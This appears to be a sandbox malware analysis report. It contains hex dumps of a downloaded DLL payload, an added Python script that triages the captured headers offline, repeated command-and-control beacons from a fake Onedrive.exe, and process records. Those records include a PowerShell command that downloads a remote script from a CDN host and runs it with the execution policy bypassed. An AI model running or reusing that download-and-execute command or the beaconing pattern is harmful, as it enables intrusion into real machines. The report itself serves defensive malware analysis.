                                                  2024-12-19 12:35:15 UTC16384INData Raw: 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 8d 44 24 28 48 89 44 24 20 4c 8b 44 24 60 48 8b 54 24 58 48 8b 4c 24 20 e8 5a 25 00 00 41 b1 01 44 8b 44 24 68 48 8b d0 48 8b 4c 24 50 e8 05 2a 00 00 48 83 c4 48 c3 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 98 00 00 00 48 c7 44 24 60 fe ff ff ff 48 83 bc 24 a8 00 00 00 00 74 0a c7 44 24 30 01 00 00 00 eb 08 c7 44 24 30 00 00 00 00 8b 44 24 30 89 44 24 34 83 7c 24 34 00 75 3a 48 8d 05 d1 b0 03 00 48 89 44 24 28 48 8d 05 15 a7 03 00 48 89 44 24 20 45 33 c9 41 b8 22 00 00 00 48 8d 15 d8 b0 03 00 b9 02 00 00 00 e8 ee 62 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 61 48 8b 8c 24 b8 00 00 00 e8 72 7a 00 00 48 89 44 24 40 ba 16 00 00 00 48 8b 4c 24 40 e8 be
                                                  Data Ascii: DL$ LD$HT$HL$HHHD$(HD$ LD$`HT$XHL$ Z%ADD$hHHL$P*HHLL$ LD$HT$HL$HHD$`H$tD$0D$0D$0D$4|$4u:HHD$(HHD$ E3A"Hbu3|$4uaH$rzHD$@HL$@
                                                  2024-12-19 12:35:15 UTC15581INData Raw: 24 38 48 8b 8c 24 90 00 00 00 e8 91 e2 ff ff 88 44 24 33 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 a9 e2 ff ff 88 44 24 33 0f b6 44 24 33 88 44 24 30 e9 23 01 00 00 ba 10 00 00 00 48 8b 8c 24 90 00 00 00 e8 a5 3b 00 00 0f b6 c0 85 c0 74 18 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 9c e2 ff ff 88 44 24 34 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 84 e2 ff ff 88 44 24 34 0f b6 44 24 34 88 44 24 30 e9 ce 00 00 00 33 c0 85 c0 74 0a c7 44 24 40 01 00 00 00 eb 08 c7 44 24 40 00 00 00 00 8b 44 24 40 89 44 24 44 83 7c 24 44 00 75 3a 48 8d 05 54 7c 03 00 48 89 44 24 28 48 8d 05 00 67 03 00 48 89 44 24 20 45 33 c9 41 b8 0b 0a 00 00 48 8d 15 f3 72 03 00 b9 02 00 00 00 e8 d9 22 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 66 48 8b 84 24 90 00 00 00 48
                                                  Data Ascii: $8H$D$3HT$8H$D$3D$3D$0#H$;tHT$8H$D$4HT$8H$D$4D$4D$03tD$@D$@D$@D$D|$Du:HT|HD$(HgHD$ E3AHr"u3|$DufH$H
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 57 eb 23 0f be 44 24 08 83 f8 41 7c 14 0f be 44 24 08 83 f8 5a 7f 0a 0f be 44 24 08 83 e8 37 eb 05 b8 ff ff ff ff c3 cc cc cc cc cc cc cc cc cc cc cc cc 66 89 4c 24 08 48 83 ec 38 0f b7 4c 24 40 e8 0d 5f 00 00 89 44 24 20 83 7c 24 20 ff 74 06 8b 44 24 20 eb 26 0f b7 44 24 40 8b c8 e8 40 6f 00 00 85 c0 74 11 0f b7 44 24 40 8b c8 e8 90 6f 00 00 83 e8 37 eb 05 b8 ff ff ff ff 48 83 c4 38 c3 cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 68 48 8b 44 24 70 48 8b 48 08 e8 e4 fd ff ff 48 89 44 24 30 48 8d 54 24 40 48 8b 4c 24 30 e8 20 f8 ff ff 48 c7 44 24 28 00 00 00 00 48 8b 44 24 70 48 8b 40 10 48 ff c8 41 b9 0a 00 00 00 4c 8d 44 24 28 48 8b d0 48 8b 44 24 70 48 8b 48 08 e8 ef 81 ff ff 48 8b 4c 24 78 89 01 48 8b 44 24 70 48 8b 48 08 e8 8a fd ff ff 48 89 44 24 38 ba
                                                  Data Ascii: W#D$A|D$ZD$7fL$H8L$@_D$ |$ tD$ &D$@@otD$@o7H8HT$HL$HhHD$pHHHD$0HT$@HL$0 HD$(HD$pH@HALD$(HHD$pHHHL$xHD$pHHHD$8
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 0f b7 40 3a 83 f8 67 74 11 48 8b 84 24 d0 00 00 00 0f b7 40 3a 83 f8 47 75 0f 48 8b 84 24 d0 00 00 00 c7 40 30 01 00 00 00 48 8b 84 24 d0 00 00 00 48 83 c0 50 48 89 44 24 60 48 8b 84 24 d0 00 00 00 8b 40 30 05 5d 01 00 00 48 98 48 8b 8c 24 d0 00 00 00 4c 8b 41 08 48 8b d0 48 8b 4c 24 60 e8 ae 61 ff ff 0f b6 c0 85 c0 75 25 48 8b 84 24 d0 00 00 00 48 83 c0 50 48 8b c8 e8 a3 60 ff ff 48 2d 5d 01 00 00 48 8b 8c 24 d0 00 00 00 89 41 30 48 8b 84 24 d0 00 00 00 48 83 c0 50 48 8b c8 e8 1e 61 ff ff 48 8b 8c 24 d0 00 00 00 48 89 41 40 48 8d 44 24 58 48 8b f8 33 c0 b9 08 00 00 00 f3 aa 48 8d 54 24 58 48 8b 8c 24 d0 00 00 00 e8 7f 65 ff ff 0f b6 c0 85 c0 75 07 32 c0 e9 bd 02 00 00 48 8b 84 24 d0 00 00 00 48 8b 40 08 48 89 44 24 68 48 8b 84 24 d0 00 00 00 48 8b 00 48
                                                  Data Ascii: @:gtH$@:GuH$@0H$HPHD$`H$@0]HH$LAHHL$`au%H$HPH`H-]H$A0H$HPHaH$HA@HD$XH3HT$XH$eu2H$H@HD$hH$HH
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 74 25 b8 01 00 00 00 48 6b c0 00 48 8b 4c 24 70 0f be 04 01 85 c0 74 0f 48 8b 44 24 70 48 89 84 24 80 00 00 00 eb 0f 48 8d 05 e5 2f 04 00 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 48 89 84 24 88 00 00 00 48 c7 44 24 48 00 00 00 00 48 c7 44 24 78 00 00 00 00 48 8d 44 24 78 48 89 44 24 20 4c 8d 4c 24 48 45 33 c0 33 d2 48 8b 8c 24 88 00 00 00 e8 0a 02 00 00 41 b8 01 00 00 00 48 8b 54 24 78 48 8b 4c 24 48 e8 f5 07 00 00 48 8b d0 48 8d 4c 24 30 e8 f8 af fe ff 48 8d 4c 24 30 e8 2e b0 fe ff 0f b6 c0 85 c0 75 26 e8 22 6b 00 00 c7 00 0c 00 00 00 c7 44 24 5c 0c 00 00 00 48 8d 4c 24 30 e8 4a fc fe ff 8b 44 24 5c e9 67 01 00 00 48 8d 4c 24 30 e8 37 b0 fe ff 48 89 84 24 90 00 00 00 48 8d 4c 24 30 e8 25 b0 fe ff 48 8b 4c 24 48 48 8d 04 c8 48 89 84 24 a8 00 00 00
                                                  Data Ascii: t%HkHL$ptHD$pH$H/H$H$H$HD$HHD$xHD$xHD$ LL$HE33H$AHT$xHL$HHHL$0HL$0.u&"kD$\HL$0JD$\gHL$07H$HL$0%HL$HHH$
                                                  2024-12-19 12:35:15 UTC16384INData Raw: e8 8e 68 fe ff 48 81 c4 b8 00 00 00 c3 cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 48 83 7c 24 40 00 75 04 33 c0 eb 2d 48 8b 4c 24 40 e8 e1 eb ff ff 48 89 44 24 20 48 8b 05 f5 f9 03 00 48 89 44 24 28 4c 8b 44 24 20 33 d2 48 8b 4c 24 28 ff 15 7e 58 02 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 18 48 83 7c 24 20 00 74 09 c7 04 24 01 00 00 00 eb 07 c7 04 24 00 00 00 00 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 68 48 83 7c 24 70 00 74 0a c7 44 24 44 01 00 00 00 eb 08 c7 44 24 44 00 00 00 00 8b 44 24 44 89 44 24 48 83 7c 24 48 00 75 3a 48 8d 05 2f b3 02 00 48 89 44 24 28 48 8d 05 03 6a 02 00 48 89 44 24 20 45 33 c9 41 b8 e4 05 00 00 48 8d 15 06 a6 02 00 b9 02
                                                  Data Ascii: hHHL$H8H|$@u3-HL$@HD$ HHD$(LD$ 3HL$(~XH8DD$T$HL$HH|$ t$$$HHL$HhH|$ptD$DD$DD$DD$H|$Hu:H/HD$(HjHD$ E3AH
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 54 24 20 48 8d 4c 24 38 e8 c6 78 ff ff 48 8b d0 b9 08 00 00 00 e8 09 fc ff ff 0f b6 44 24 60 85 c0 74 0a 8b 44 24 20 89 44 24 28 eb 08 8b 44 24 24 89 44 24 28 8b 44 24 28 48 83 c4 58 c3 cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8d 4c 24 40 e8 c8 30 fe ff 0f b6 c0 85 c0 75 04 32 c0 eb 48 48 8d 4c 24 40 e8 23 fe fe ff 89 44 24 20 8b 4c 24 20 e8 76 00 00 00 0f b6 c0 85 c0 75 04 32 c0 eb 26 8b 4c 24 20 e8 c2 00 00 00 0f b6 c0 85 c0 75 14 48 8b 44 24 48 8b 00 ff c0 48 8b 4c 24 48 89 01 32 c0 eb 02 b0 01 48 83 c4 38 c3 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 e8 c9 fd fe ff 23 44 24 48 3b 44 24 48 75 0a c7 44 24 20 01 00 00 00 eb 08 c7 44 24 20 00 00 00 00 0f b6 44 24 20 48 83 c4 38 c3 cc cc cc 89 4c 24 08 48 83 ec 18 8b 44 24 20
                                                  Data Ascii: T$ HL$8xHD$`tD$ D$(D$$D$(D$(HXHT$HL$H8HL$@0u2HHL$@#D$ L$ vu2&L$ uHD$HHL$H2H8T$HL$H8HL$@#D$H;D$HuD$ D$ D$ H8L$HD$
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 00 00 48 8b 84 24 08 01 00 00 48 89 44 24 38 8b 84 24 00 01 00 00 89 44 24 30 8b 84 24 f0 00 00 00 89 44 24 28 48 8b 84 24 e0 00 00 00 48 89 44 24 20 4c 8b 8c 24 d8 00 00 00 4c 8b 84 24 d0 00 00 00 48 8b 94 24 c8 00 00 00 48 8b 8c 24 c0 00 00 00 e8 fc f0 ff ff e9 a6 00 00 00 33 c0 85 c0 75 3a 48 8d 05 aa 4d 02 00 48 89 44 24 28 48 8d 05 76 ea 01 00 48 89 44 24 20 45 33 c9 41 b8 4c 03 00 00 48 8d 15 89 48 02 00 b9 02 00 00 00 e8 4f a6 ff ff 83 f8 01 75 03 cc 33 c0 48 8b 84 24 08 01 00 00 48 89 44 24 48 8b 84 24 00 01 00 00 89 44 24 40 8b 44 24 58 89 44 24 38 0f b6 44 24 50 88 44 24 30 8b 84 24 f0 00 00 00 89 44 24 28 48 8b 84 24 e0 00 00 00 48 89 44 24 20 4c 8b 8c 24 d8 00 00 00 4c 8b 84 24 d0 00 00 00 48 8b 94 24 c8 00 00 00 48 8b 8c 24 c0 00 00 00 e8 21
                                                  Data Ascii: H$HD$8$D$0$D$(H$HD$ L$L$H$H$3u:HMHD$(HvHD$ E3ALHHOu3H$HD$H$D$@D$XD$8D$PD$0$D$(H$HD$ L$L$H$H$!

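The response above is the second-stage payload: an `application/octet-stream` body of 371712 bytes whose first chunk starts with an MZ header, a standard DOS stub and a Rich header. Before opening a file like this in a disassembler, a responder usually cross-checks the capture against itself: does the ETag agree with Content-Length and Last-Modified, does e_lfanew point inside the file, and what does the Rich header say about the toolchain. The following script is an added triage example, not part of the Joe Sandbox report and not code from the sample. It embeds the response headers and the first 255 body bytes exactly as printed in the capture; the assumption that the CDN's ETag follows the Apache-style `<mtime-hex>-<size-hex>` convention is made here, and the values in this capture are consistent with it. Product IDs and build numbers from the Rich header are reported numerically only.

```python
"""Offline triage of a file download captured in a sandbox network dump.

Added example, not part of the Joe Sandbox report. The inputs are the
response headers and the first 255 body bytes printed above for
GET /sppc.dll, copied into constants so the script runs without the sample.
"""
import struct
from email.utils import parsedate_to_datetime

# Subset of the response headers from the capture.
HEADERS = {
    "Content-Type": "application/octet-stream",
    "Content-Length": "371712",
    "ETag": '"67629392-5ac00"',
    "Last-Modified": "Wed, 18 Dec 2024 09:19:14 GMT",
}

# Body bytes 0x00-0xfe as printed in the first "Data Raw" line: DOS header,
# DOS stub and the Rich header. e_lfanew (0x110) lies past the shown bytes.
BODY_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"  # MZ header
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000010010000"  # e_lfanew = 0x110 at offset 0x3c
    "0e1fba0e00b409cd21b8014ccd215468"  # DOS stub
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
    "3e87d9e07ae6b7b37ae6b7b37ae6b7b3"  # Rich header: DanS ^ key, key x3
    "319eb4b27de6b7b3319eb2b2f6e6b7b3"
    "319eb3b270e6b7b36a62b4b273e6b7b3"
    "6a62b3b274e6b7b36a62b2b25ae6b7b3"
    "319eb6b279e6b7b37ae6b6b312e6b7b3"
    "3163b3b279e6b7b33163b7b27be6b7b3"
    "316348b37be6b7b33163b5b27be6b7b3"
    "526963687ae6b7b300000000000000"    # "Rich", key, padding (dump truncated)
)

DANS = 0x536E6144  # little-endian "DanS"


def decode_etag(etag):
    """Split an Apache-style "<mtime-hex>-<size-hex>" ETag into integers.

    Assumption: the CDN uses that convention. In this capture the size part
    (0x5ac00) equals Content-Length and the time part equals Last-Modified.
    """
    mtime_hex, size_hex = etag.strip('"').split("-")
    return int(mtime_hex, 16), int(size_hex, 16)


def check_headers(headers):
    """Cross-check the download headers against each other."""
    mtime, size = decode_etag(headers["ETag"])
    last_mod = parsedate_to_datetime(headers["Last-Modified"])
    return {
        "octet_stream": headers["Content-Type"] == "application/octet-stream",
        "etag_size_matches_length": size == int(headers["Content-Length"]),
        "etag_time_matches_last_modified": mtime == int(last_mod.timestamp()),
    }


def parse_dos_header(data):
    """Return the MZ magic check and e_lfanew from the first 64 bytes."""
    if len(data) < 0x40:
        raise ValueError("need at least 64 bytes")
    e_magic, = struct.unpack_from("<H", data, 0)
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    return {"is_mz": e_magic == 0x5A4D, "e_lfanew": e_lfanew}


def parse_rich_header(data):
    """Decode the Rich header: XOR key, DanS marker and (prodid, build, count) entries."""
    rich_off = data.find(b"Rich")
    if rich_off < 0:
        return None
    key, = struct.unpack_from("<I", data, rich_off + 4)
    # Walk backwards one dword at a time until the masked DanS marker appears.
    off = rich_off - 4
    while off >= 0x40:
        dword, = struct.unpack_from("<I", data, off)
        if dword ^ key == DANS:
            break
        off -= 4
    else:
        return {"key": key, "dans_ok": False, "entries": []}
    entries = []
    for pos in range(off + 16, rich_off, 8):  # skip DanS and three key paddings
        comp, count = struct.unpack_from("<II", data, pos)
        comp ^= key
        entries.append((comp >> 16, comp & 0xFFFF, count ^ key))
    return {"key": key, "dans_ok": True, "entries": entries}


def triage(headers, body):
    """Summarise what a responder wants to know before opening the file."""
    dos = parse_dos_header(body)
    rich = parse_rich_header(body)
    length = int(headers["Content-Length"])
    return {
        **check_headers(headers),
        "is_pe": dos["is_mz"] and dos["e_lfanew"] < length,
        "e_lfanew": dos["e_lfanew"],
        "rich_key": rich["key"] if rich else None,
        "rich_entries": len(rich["entries"]) if rich else 0,
        "max_build": max((b for _, b, _ in rich["entries"]), default=0) if rich else 0,
    }


if __name__ == "__main__":
    for k, v in triage(HEADERS, BODY_PREFIX).items():
        print(f"{k:32} {v!r}")
```

Run against the captured bytes this reports an MZ file with e_lfanew 0x110, a Rich header keyed with 0xb3b7e67a that decodes cleanly (the masked DanS marker is found) with twelve entries, and header fields that agree with each other. A Rich header that fails the DanS check, or an ETag that disagrees with Content-Length, is worth noting in the case file because both point at a file that was edited after compilation or at a server that is not serving what it claims to.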

                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.4 | 49735 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:35:18 UTC | 179 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 279
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:35:18 UTC279OUTData Raw: 00 00 01 13 de ad be ef 34 14 9c 50 00 00 00 63 00 00 00 00 b6 d0 4a 3c 32 82 6a 94 78 92 e0 4a 52 26 2a d0 1e 4a 9a 1a 5a 5e e6 30 a2 12 e4 14 e2 06 80 12 a4 f0 cc 1a f2 1a b8 d0 82 e0 70 24 28 ba 42 1c e1 cd 69 ff d4 81 08 c7 7b d3 b6 a1 42 69 d4 d5 0a e6 9b 46 3d d6 2f 3b a6 d4 9c a9 cd 9a 2b f7 5e fe 2d 66 95 39 b9 cc 5f 48 2f 9f 1e 50 12 c2 fd 67 0d 18 83 41 df 25 21 03 84 96 e6 99 6f 60 30 69 db 28 79 e2 5f db df fa e7 c1 70 5a 53 2b 7e 32 98 e1 af 16 bd e3 9a 15 80 82 16 15 99 dd 29 2b 42 5a f2 0e af d9 49 ee a4 49 a5 53 73 bc df e1 ef 7e 55 1c da 6c ac 62 d0 ce 47 7d f5 16 d8 53 b9 b5 08 47 b5 a4 05 89 36 88 39 46 a4 fd e6 f5 de 00 20 59 77 8f b3 4d 3c a6 56 7e 7b 15 57 a5 0c f8 c5 1a ec 36 97 bd 45 24 bf 86 69 49 ee 96 6b fe 8f 48 c1 44 00 1a e1
                                                  Data Ascii: 4PcJ<2jxJR&*JZ^0p$(Bi{BiF=/;+^-f9_H/PgA%!o`0i(y_pZS+~2)+BZIISs~UlbG}SG69F YwM<V~{W6E$iIkHD
                                                  2024-12-19 12:35:19 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:19 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 4
                                                  Content-Type: text/plain; charset=utf-8
                                                  Connection: close
                                                  2024-12-19 12:35:19 UTC | 4 | IN | Data Raw: 85 45 e1 9b
                                                  Data Ascii: E


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.4 | 49742 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:35:46 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:35:46 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:35:47 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:47 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:35:47 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.4 | 49785 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:36:18 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:36:18 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:36:19 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:36:19 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:36:19 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.4 | 49864 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:36:53 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:36:53 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:36:54 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:36:54 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:36:54 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.4 | 49927 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:37:21 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:37:21 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:37:22 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:37:22 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:37:22 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.4 | 49985 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:37:46 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:37:46 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:37:47 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:37:47 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:37:47 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  9 | 192.168.2.4 | 50013 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:38:12 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:38:12 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:38:13 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:38:12 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:38:13 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  10 | 192.168.2.4 | 50014 | 47.84.196.148 | 443 | 8020 | C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-19 12:38:44 UTC | 178 | OUT | POST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:38:44 UTC | 20 | OUT | Data Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:38:45 UTC | 167 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:38:45 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:38:45 UTC | 12 | IN | Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Target ID:0
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
                                                  Imagebase:0x7ff6b9c00000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:07:35:15
                                                  Start date:19/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Onedrive.exe"
                                                  Imagebase:0x7ff63ea10000
                                                  File size:110'536 bytes
                                                  MD5 hash:32C31F06E0B68F349F68AFDD08E45F3D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                    Memory Dump Source
